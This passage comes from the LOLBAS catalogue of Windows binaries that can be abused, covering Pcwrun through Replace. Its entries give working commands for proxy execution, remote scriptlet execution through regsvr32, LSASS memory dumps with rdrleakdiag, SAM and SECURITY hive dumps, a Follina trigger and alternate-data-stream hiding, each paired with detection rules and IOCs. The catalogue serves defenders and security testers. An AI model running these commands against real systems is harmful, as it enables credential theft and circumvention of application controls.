Windows 10, Windows 11 Tags: - Execute: DLL Full_Path: - Path: C:\Windows\System32\pcalua.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml Resources: - Link: https://twitter.com/KyleHanslovan/status/912659279806640128 Acknowledgement: - Person: Kyle Hanslovan Handle: '@kylehanslovan' - Person: Fab Handle: '@0rbz_' ================================================ FILE: yml/OSBinaries/Pcwrun.yml ================================================ --- Name: Pcwrun.exe Description: Program Compatibility Wizard Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: Pcwrun.exe {PATH_ABSOLUTE:.exe} Description: Open the target .EXE file with the Program Compatibility Wizard. Usecase: Proxy execution of binary Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - Command: Pcwrun.exe /../../$(calc).exe Description: Leverage the MSDT follina vulnerability through Pcwrun to execute arbitrary commands and binaries. Note that this specific technique will not work on a patched system with the June 2022 Windows Security update. Usecase: Proxy execution of binary Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE Full_Path: - Path: C:\Windows\System32\pcwrun.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml Resources: - Link: https://twitter.com/pabraeken/status/991335019833708544 - Link: https://twitter.com/nas_bench/status/1535663791362519040 Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' - Person: Nasreddine Bencherchali Handle: '@nas_bench' ================================================ FILE: yml/OSBinaries/Pktmon.yml ================================================ --- Name: Pktmon.exe Description: Capture Network Packets on the windows 10 with October 2018 Update or later. Author: Derek Johnson Created: 2020-08-12 Commands: - Command: pktmon.exe start --etw Description: Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop Usecase: use this a built in network sniffer on windows 10 to capture senstive traffic Category: Reconnaissance Privileges: Administrator MitreID: T1040 OperatingSystem: Windows 10 1809 and later, Windows 11 - Command: pktmon.exe filter add -p 445 Description: Select Desired ports for packet capture Usecase: Look for interesting traffic such as telent or FTP Category: Reconnaissance Privileges: Administrator MitreID: T1040 OperatingSystem: Windows 10 1809 and later, Windows 11 Full_Path: - Path: c:\windows\system32\pktmon.exe - Path: c:\windows\syswow64\pktmon.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml - IOC: .etl files found on system Resources: - Link: https://binar-x79.com/windows-10-secret-sniffer/ Acknowledgement: - Person: Derek Johnson ================================================ FILE: yml/OSBinaries/Pnputil.yml ================================================ --- Name: Pnputil.exe Description: Used for installing drivers Author: Hai vaknin (lux) Created: 2020-12-25 Commands: - Command: pnputil.exe -i -a {PATH_ABSOLUTE:.inf} Description: Used for installing drivers Usecase: Add malicious driver Category: Execute Privileges: Administrator MitreID: T1547 OperatingSystem: Windows 7, Windows 10, Windows 11 Tags: - Execute: INF Full_Path: - Path: C:\Windows\system32\pnputil.exe Code_Sample: - Code: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml Acknowledgement: - Person: Hai Vaknin(Lux) Handle: '@LuxNoBulIshit' - Person: Avihay eldad Handle: '@aloneliassaf' ================================================ FILE: yml/OSBinaries/Presentationhost.yml ================================================ --- Name: Presentationhost.exe Description: File is used for executing Browser applications Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: Presentationhost.exe {PATH_ABSOLUTE:.xbap} Description: Executes the target XAML Browser Application (XBAP) file Usecase: Execute code within XBAP files Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: XBAP - Command: Presentationhost.exe {REMOTEURL} Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Download: INetCache Full_Path: - Path: C:\Windows\System32\Presentationhost.exe - Path: C:\Windows\SysWOW64\Presentationhost.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml - IOC: Execution of .xbap files may not be common on production workstations Resources: - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf - Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ Acknowledgement: - Person: Casey Smith Handle: '@subtee' - Person: Nir Chako (Pentera) Handle: '@C_h4ck_0' ================================================ FILE: yml/OSBinaries/Print.yml ================================================ --- Name: Print.exe Description: Used by Windows to send files to the printer Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: print /D:{PATH_ABSOLUTE}:file.exe {PATH_ABSOLUTE:.exe} Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt. Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_ABSOLUTE:.source.exe} Description: Copy file from source to destination Usecase: Copy files Category: Copy Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_SMB:.source.exe} Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe. Usecase: Copy/Download file from remote server Category: Copy Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\print.exe - Path: C:\Windows\SysWOW64\print.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml - IOC: Print.exe retrieving files from internet - IOC: Print.exe creating executable files on disk Resources: - Link: https://twitter.com/Oddvarmoe/status/985518877076541440 - Link: https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410 Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ================================================ FILE: yml/OSBinaries/PrintBrm.yml ================================================ --- Name: PrintBrm.exe Description: Printer Migration Command-Line Tool Author: Elliot Killick Created: 2021-06-21 Commands: - Command: PrintBrm -b -d {PATH_SMB:folder} -f {PATH_ABSOLUTE:.zip} Description: Create a ZIP file from a folder in a remote drive Usecase: Exfiltrate the contents of a remote folder on a UNC share into a zip file Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Type: Compression - Command: PrintBrm -r -f {PATH_ABSOLUTE}:hidden.zip -d {PATH_ABSOLUTE:folder} Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Type: Compression Full_Path: - Path: C:\Windows\System32\spool\tools\PrintBrm.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml - IOC: PrintBrm.exe should not be run on a normal workstation Resources: - Link: https://twitter.com/elliotkillick/status/1404117015447670800 Acknowledgement: - Person: Elliot Killick Handle: '@elliotkillick' ================================================ FILE: yml/OSBinaries/Provlaunch.yml ================================================ --- Name: Provlaunch.exe Description: Launcher process Author: Grzegorz Tworek Created: 2023-06-30 Commands: - Command: provlaunch.exe LOLBin Description: 'Executes command defined in the Registry. Requires 3 levels of the key structure containing some keywords. Such keys may be created with two reg.exe commands, e.g. `reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0` and `reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe`. Registry keys are deleted after successful execution.' Usecase: Executes arbitrary command Category: Execute Privileges: Administrator MitreID: T1218 OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 Tags: - Execute: CMD Full_Path: - Path: c:\windows\system32\provlaunch.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_provlaunch_potential_abuse.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_provlaunch_susp_child_process.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/registry/registry_set/registry_set_provisioning_command_abuse.yml - IOC: c:\windows\system32\provlaunch.exe executions - IOC: Creation/existence of HKLM\SOFTWARE\Microsoft\Provisioning\Commands subkeys Resources: - Link: https://twitter.com/0gtweet/status/1674399582162153472 Acknowledgement: - Person: Grzegorz Tworek Handle: '@0gtweet' ================================================ FILE: yml/OSBinaries/Psr.yml ================================================ --- Name: Psr.exe Description: Windows Problem Steps Recorder, used to record screen and clicks. Author: Leon Rodenko Created: 2020-06-27 Commands: - Command: psr.exe /start /output {PATH_ABSOLUTE:.zip} /sc 1 /gui 0 Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file. Usecase: Can be used to take screenshots of the user environment Category: Reconnaissance Privileges: User MitreID: T1113 OperatingSystem: since Windows 7 (client) / Windows 2008 R2 Full_Path: - Path: c:\windows\system32\psr.exe - Path: c:\windows\syswow64\psr.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml - IOC: psr.exe spawned - IOC: suspicious activity when running with "/gui 0" flag Resources: - Link: https://social.technet.microsoft.com/wiki/contents/articles/51722.windows-problem-steps-recorder-psr-quick-and-easy-documenting-of-your-steps-and-procedures.aspx Acknowledgement: - Person: Leon Rodenko Handle: '@L3m0nada' ================================================ FILE: yml/OSBinaries/Query.yml ================================================ --- Name: Query.exe Description: Remote Desktop Services MultiUser Query Utility Author: Idan Lerman Created: 2025-07-31 Commands: - Command: query.exe user Description: Once executed, `query.exe` will execute `quser.exe` in the same folder. Thus, if `query.exe` is copied to a folder and an arbitrary executable is renamed to `quser.exe`, `query.exe` will spawn it. Instead of `user`, it is also possible to use `session`, `termsession` or `process` as command-line option. Usecase: Execute an arbitrary executable via trusted system executable. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Requires: Rename Full_Path: - Path: c:\windows\system32\query.exe - Path: c:\windows\syswow64\query.exe Detection: - IOC: query.exe being executed and executes a child process outside of its normal path of c:\windows\system32\ or c:\windows\syswow64\ Acknowledgement: - Person: Idan Lerman Handle: '@IdanLerman' ================================================ FILE: yml/OSBinaries/Rasautou.yml ================================================ --- Name: Rasautou.exe Description: Windows Remote Access Dialer Author: Tony Lambert Created: 2020-01-10 Commands: - Command: rasautou -d {PATH:.dll} -p export_name -a a -e e Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10. Usecase: Execute DLL code Category: Execute Privileges: User, Administrator in Windows 8 MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1 Tags: - Execute: DLL Full_Path: - Path: C:\Windows\System32\rasautou.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_rasautou_dll_execution.yml - IOC: rasautou.exe command line containing -d and -p Resources: - Link: https://github.com/fireeye/DueDLLigence - Link: https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html Acknowledgement: - Person: FireEye Handle: '@FireEye' ================================================ FILE: yml/OSBinaries/Rdrleakdiag.yml ================================================ --- Name: rdrleakdiag.exe Description: Microsoft Windows resource leak diagnostic tool Author: 'John Dwyer' Created: 2022-05-18 Commands: - Command: rdrleakdiag.exe /p 940 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1 Description: Dump process by PID and create a dump file (creates files called `minidump_.dmp` and `results_.hlk`). Usecase: Dump process by PID. Category: Dump Privileges: User MitreID: T1003 OperatingSystem: Windows - Command: rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1 Description: Dump LSASS process by PID and create a dump file (creates files called `minidump_.dmp` and `results_.hlk`). Usecase: Dump LSASS process. Category: Dump Privileges: Administrator MitreID: T1003.001 OperatingSystem: Windows - Command: rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /snap Description: After dumping a process using `/wait 1`, subsequent dumps must use `/snap` (creates files called `minidump_.dmp` and `results_.hlk`). Usecase: Dump LSASS process mutliple times. Category: Dump Privileges: Administrator MitreID: T1003.001 OperatingSystem: Windows Full_Path: - Path: c:\windows\system32\rdrleakdiag.exe - Path: c:\Windows\SysWOW64\rdrleakdiag.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml - Elastic: https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml Resources: - Link: https://twitter.com/0gtweet/status/1299071304805560321?s=21 - Link: https://www.pureid.io/dumping-abusing-windows-credentials-part-1/ - Link: https://github.com/LOLBAS-Project/LOLBAS/issues/84 Acknowledgement: - Person: Grzegorz Tworek Handle: '@0gtweet' ================================================ FILE: yml/OSBinaries/Reg.yml ================================================ --- Name: Reg.exe Description: Used to manipulate the registry Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg {PATH_ABSOLUTE}:evilreg.reg Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream. Usecase: Hide/plant registry information in Alternate data stream for later use Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: reg save HKLM\SECURITY {PATH_ABSOLUTE:.1.bak} && reg save HKLM\SYSTEM {PATH_ABSOLUTE:.2.bak} && reg save HKLM\SAM {PATH_ABSOLUTE:.3.bak} Description: Dump registry hives (SAM, SYSTEM, SECURITY) to retrieve password hashes and key material Usecase: Dump credentials from the Security Account Manager (SAM) Category: Credentials Privileges: Administrator MitreID: T1003.002 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\reg.exe - Path: C:\Windows\SysWOW64\reg.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/attempted_credential_dump_from_registry_via_reg_exe.yml - Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_dump_registry_hives.toml - IOC: reg.exe writing to an ADS Resources: - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - Link: https://pure.security/dumping-windows-credentials/ Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ================================================ FILE: yml/OSBinaries/Regasm.yml ================================================ --- Name: Regasm.exe Description: Part of .NET Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: regasm.exe {PATH:.dll} Description: Loads the target .NET DLL file and executes the RegisterClass function. Usecase: Execute code and bypass Application whitelisting Category: AWL Bypass Privileges: Local Admin MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL (.NET) - Command: regasm.exe /U {PATH:.dll} Description: Loads the target .DLL file and executes the UnRegisterClass function. Usecase: Execute code and bypass Application whitelisting Category: Execute Privileges: User MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml - Splunk: https://github.com/splunk/security_content/blob/bc93e670f5dcb24e96fbe3664d6bcad92df5acad/docs/_stories/suspicious_regsvcs_regasm_activity.md - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regasm_with_network_connection.yml - IOC: regasm.exe executing dll file Resources: - Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md Acknowledgement: - Person: Casey Smith Handle: '@subtee' ================================================ FILE: yml/OSBinaries/Regedit.yml ================================================ --- Name: Regedit.exe Description: Used by Windows to manipulate registry Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: regedit /E {PATH_ABSOLUTE}:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey Description: Export the target Registry key to the specified .REG file. Usecase: Hide registry data in alternate data stream Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: regedit {PATH_ABSOLUTE}:regfile.reg Description: Import the target .REG file into the Registry. Usecase: Import hidden registry data from alternate data stream Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\regedit.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml - IOC: regedit.exe reading and writing to alternate data stream - IOC: regedit.exe should normally not be executed by end-users Resources: - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ================================================ FILE: yml/OSBinaries/Regini.yml ================================================ --- Name: Regini.exe Description: Used to manipulate the registry Author: Oddvar Moe Created: 2020-07-03 Commands: - Command: regini.exe {PATH}:hidden.ini Description: Write registry keys from data inside the Alternate data stream. Usecase: Write to registry Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\regini.exe - Path: C:\Windows\SysWOW64\regini.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_ads.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_execution.yml - IOC: regini.exe reading from ADS Resources: - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f Acknowledgement: - Person: Eli Salem Handle: '@elisalem9' ================================================ FILE: yml/OSBinaries/Register-cimprovider.yml ================================================ --- Name: Register-cimprovider.exe Description: Used to register new wmi providers Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: Register-cimprovider -path {PATH_ABSOLUTE:.dll} Description: Load the target .DLL. Usecase: Execute code within dll file Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL Full_Path: - Path: C:\Windows\System32\Register-cimprovider.exe - Path: C:\Windows\SysWOW64\Register-cimprovider.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml - IOC: Register-cimprovider.exe execution and cmdline DLL load may be supsicious Resources: - Link: https://twitter.com/PhilipTsukerman/status/992021361106268161 Acknowledgement: - Person: Philip Tsukerman Handle: '@PhilipTsukerman' ================================================ FILE: yml/OSBinaries/Regsvcs.yml ================================================ --- Name: Regsvcs.exe Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: regsvcs.exe {PATH:.dll} Description: Loads the target .NET DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting Category: Execute Privileges: User MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL (.NET) - Command: regsvcs.exe {PATH:.dll} Description: Loads the target .NET DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting Category: AWL Bypass Privileges: Local Admin MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegSvcs.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regsvcs_with_network_connection.yml Resources: - Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md Acknowledgement: - Person: Casey Smith Handle: '@subtee' ================================================ FILE: yml/OSBinaries/Regsvr32.yml ================================================ --- Name: Regsvr32.exe Description: Used by Windows to register dlls Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll Description: Execute the specified remote .SCT script with scrobj.dll. Usecase: Execute code from remote scriptlet, bypass Application whitelisting Category: AWL Bypass Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: SCT - Execute: Remote - Command: regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting Category: AWL Bypass Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: SCT - Command: regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll Description: Execute the specified remote .SCT script with scrobj.dll. Usecase: Execute code from remote scriptlet, bypass Application whitelisting Category: Execute Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: SCT - Execute: Remote - Command: regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting Category: Execute Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: SCT - Command: regsvr32.exe /s {PATH:.dll} Description: Execute code in a DLL. The code must be inside the exported function `DllRegisterServer`. Usecase: Execute DLL file Category: Execute Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - Command: regsvr32.exe /u /s {PATH:.dll} Description: Execute code in a DLL. The code must be inside the exported function `DllUnRegisterServer`. Usecase: Execute DLL file Category: Execute Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL Full_Path: - Path: C:\Windows\System32\regsvr32.exe - Path: C:\Windows\SysWOW64\regsvr32.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml - IOC: regsvr32.exe retrieving files from Internet - IOC: regsvr32.exe executing scriptlet (sct) files - IOC: DotNet CLR libraries loaded into regsvr32.exe - IOC: DotNet CLR Usage Log - regsvr32.exe.log Resources: - Link: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md Acknowledgement: - Person: Casey Smith Handle: '@subtee' ================================================ FILE: yml/OSBinaries/Replace.yml ================================================ --- Name: Replace.exe Description: Used to replace file with another file Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: replace.exe {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE:folder} /A Description: Copy .cab file to destination Usecase: Copy files Category: Copy Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: replace.exe {PATH_SMB:.exe} {PATH_ABSOLUTE:folder} /A Description: Download/Copy executable to specified folder Usecase: Download file Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, 